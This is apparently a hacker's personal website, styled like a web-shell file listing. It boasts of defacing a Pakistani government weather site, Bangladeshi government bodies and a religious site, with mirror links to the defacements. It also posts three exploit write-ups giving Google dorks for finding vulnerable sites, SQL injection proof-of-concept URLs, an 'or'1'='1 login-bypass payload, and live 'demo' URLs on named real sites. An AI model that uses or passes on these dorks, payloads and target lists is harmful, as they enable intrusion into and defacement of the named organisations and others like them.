dr.t3rr0r
Official Website


today : Friday, April 11, 2025 | at : | safemode : ON
> / home / terror / public_html /
name author perms com modified label

Pakistan Government Meteorological Department Website Hacked dr.t3rr0r rwxr-xr-x 0 1:20 AM

Filename Pakistan Government Meteorological Department Website Hacked
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 1:20 AM
Label
Action
::: Pakistan Government Meteorological Department Website got Hacked :::

Site : http://pmd.gov.pk/
Mirror : https://zone-db.com/mirror_32146.html

Hacked by dr.t3rr0r
Defaced by dr.t3rr0r


Bangladesh Nursing Council got Hacked ! dr.t3rr0r rwxr-xr-x 0 7:42 AM

Filename Bangladesh Nursing Council got Hacked !
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 7:42 AM
Label
Action
Bangladesh Nursing Council got Hacked !

Site : http://www.bnmc.gov.bd/terror.html
Mirror : http://dark-h.org/deface/id/200671

Patiya Govt. College of Bangladesh G0t Hacked ! dr.t3rr0r rwxr-xr-x 0 7:42 AM

Filename Patiya Govt. College of Bangladesh G0t Hacked !
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 7:42 AM
Label
Action
Patiya Govt. College of Bangladesh G0t Hacked !

Site : http://patiyagovtcollege.gov.bd/welcome/single_notice/46
Mirror : http://www.hack-mirror.com/260651.html


Official Jain Samaj Religious Website Got Hacked dr.t3rr0r rwxr-xr-x 0 2:44 AM

Filename Official Jain Samaj Religious Website Got Hacked
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:44 AM
Label
Action
dr.t3rr0r
Defaced ScreenShot dr.t3rr0r
::: Official Jain Samaj Religious Website Got Hacked :::

Site : http://jainsamaj.org
Mirror : http://www.hack-mirror.com/259729.html

Xsosys Technology Web Development Sql Injection Vulnerablity dr.t3rr0r rwxr-xr-x 0 2:38 AM

Filename Xsosys Technology Web Development Sql Injection Vulnerablity
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:38 AM
Label
Action
[#] Exploit Title : Xsosys Technology Web Development Sql Injection

Vulnerablity



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.xsosys.com/



[#] Google Dork : Powered by Xsosys inurl:php?id=



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux



=========================================================



[+] Severity Level          :- High





[+] Request Method(s)       :- GET / POST





[+] Vulnerable Parameter(s) :- id





[+] Affected Area(s)        :- Entire admin, database, Server







[+] POC                     :- http://127.0.0.1/XXX.php?page=[SQL]'





The sql Injection web vulnerability can be be exploited by remote

attackers without any privilege of web-application user account or

user interaction.





[#] Demos :



http://www.gaiascience.com.mm/show_event.php?id=21'



http://www.gaiascience.com.sg/show_content.php?id=26'



http://www.gaialifeinternational.com/show_content.php?id=23'





[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Exploit4Arab 

Falcon Breeze Development Sql Injection Vulnerablity dr.t3rr0r rwxr-xr-x 0 2:37 AM

Filename Falcon Breeze Development Sql Injection Vulnerablity
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:37 AM
Label
Action
[#] Exploit Title : Falcon Breeze Development Sql Injection Vulnerablity



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.falconbreeze.com



[#] Google Dork : intext:"Developing in Progress by Falcon Breeze."



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux



=========================================================



[+] Severity Level          :- High





[+] Request Method(s)       :- GET / POST





[+] Vulnerable Parameter(s) :- id





[+] Affected Area(s)        :- Entire admin, database, Server







[+] POC                     :- http://127.0.0.1/XXX.php?page=[SQL]'



The sql Injection web vulnerability can be be exploited by remote

attackers without any privilege of web-application user account or

user interaction.



Error is Like Below.

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL

result resource in /home/falconbr/public_html/files/new_detail.php on

line 16



[#] Demos :



http://www.ama.org.mm/index.php?page=postdetail&id=7'



http://www.falconbreeze.com/index.php?page=detail&new=133'





[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Exploit4Arab 

Maurya Consultancy Services Bypass Admin Page Vulnerability dr.t3rr0r rwxr-xr-x 0 8:28 PM

Filename Maurya Consultancy Services Bypass Admin Page Vulnerability
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 8:28 PM
Label
Action
[#] Exploit Title : Maurya Consultancy Services Bypass Admin Page Vulnerability



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.mcslinc.com/



[#] Google Dork : intext:"Design by mcslinc.com"



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux







[#] And then choose a target and put this after url : /admin/login.php







[#] And fill username and password like the information below :



[#] Username : 'or'1'='1



[#] Password : 'or'1'='1







[#] Demos :



http://gretdhara.com/admin/login.php



http://dhanshreemultitrade.com/admin/login.php



[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Source : Exploit4Arab
 

Template © IT is Unknown! Use To Learn ! Learn to Hack ! Hack to Learn ! Hack to Use ! | by dr.t3rr0r |
VB (Vio b374k) Template design by dr.t3rr0r